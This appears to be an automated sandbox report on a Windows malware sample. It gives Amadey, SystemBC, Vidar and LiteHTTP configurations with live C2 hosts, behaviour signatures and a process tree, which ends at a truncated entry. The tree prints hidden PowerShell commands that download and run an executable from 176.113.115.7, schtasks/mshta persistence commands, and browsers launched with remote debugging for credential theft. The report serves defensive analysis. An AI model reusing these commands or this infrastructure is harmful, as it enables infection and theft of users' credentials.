Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 01:29

General

  • Target

    bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

  • Size

    3.1MB

  • MD5

    6fff0bde80320c306f02d25c633ea187

  • SHA1

    18bab497bc210c2e3606071d4b2fef620957b679

  • SHA256

    bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e

  • SHA512

    b6f9c20e0ed117c726fc09c99d545228d4a67e814d56be1600b3b7dc0f3ddc7c05a545ea4afa7529626ee80b480c6d09c20142a54c043cc519a2b289352d397b

  • SSDEEP

    49152:OYyAn7ZpDTuJn8jNQ291qRgTB+5TCY3sQwDABrYD8EsF:Jf7ZpDe85QhRgklCY3srEBkU

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 21 IoCs
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 17 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 56 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    PID:3452
    • C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe
      "C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
        "C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1192
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1088
          • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
            "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3960
            • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
              "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
              6⤵
              • Downloads MZ/PE file
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5048
              • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
                "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1640
          • C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
            "C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3280
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn 7t65Omafmt1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3680
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn 7t65Omafmt1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2964
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5040
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4692
                • C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE
                  "C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3064
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1028
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              6⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:1408
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1476
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:820
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3420
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4320
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2184
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:948
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "a3WAkmatu4N" /tr "mshta \"C:\Temp\5Aqb7QJ60.hta\"" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1768
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\5Aqb7QJ60.hta"
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4972
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2760
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:968
          • C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe
            "C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:668
          • C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe
            "C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"
            5⤵
            • Executes dropped EXE
            PID:1976
          • C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe
            "C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2756
          • C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe
            "C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1652
          • C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe
            "C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3964
          • C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe
            "C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5032
            • C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe
              "C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:4052
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1028
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe988fcc40,0x7ffe988fcc4c,0x7ffe988fcc58
                  8⤵
                    PID:208
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1912 /prefetch:2
                    8⤵
                      PID:760
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:3
                      8⤵
                        PID:1644
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2356 /prefetch:8
                        8⤵
                          PID:3304
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3100 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:4984
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:2448
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4612 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:1944
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4532,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4420 /prefetch:8
                          8⤵
                            PID:5144
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
                            8⤵
                              PID:5152
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8
                              8⤵
                                PID:5472
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8
                                8⤵
                                  PID:5588
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8
                                  8⤵
                                    PID:5964
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:8
                                    8⤵
                                      PID:6032
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5244,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:8
                                      8⤵
                                        PID:6068
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8
                                        8⤵
                                          PID:5584
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5364,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5536 /prefetch:2
                                          8⤵
                                          • Uses browser remote debugging
                                          PID:6092
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        7⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5236
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe989046f8,0x7ffe98904708,0x7ffe98904718
                                          8⤵
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:5260
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
                                          8⤵
                                            PID:5816
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3
                                            8⤵
                                              PID:5824
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
                                              8⤵
                                                PID:5192
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:6008
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:5960
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:4600
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4460 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:2556
                                            • C:\Windows\SysWOW64\cmd.exe
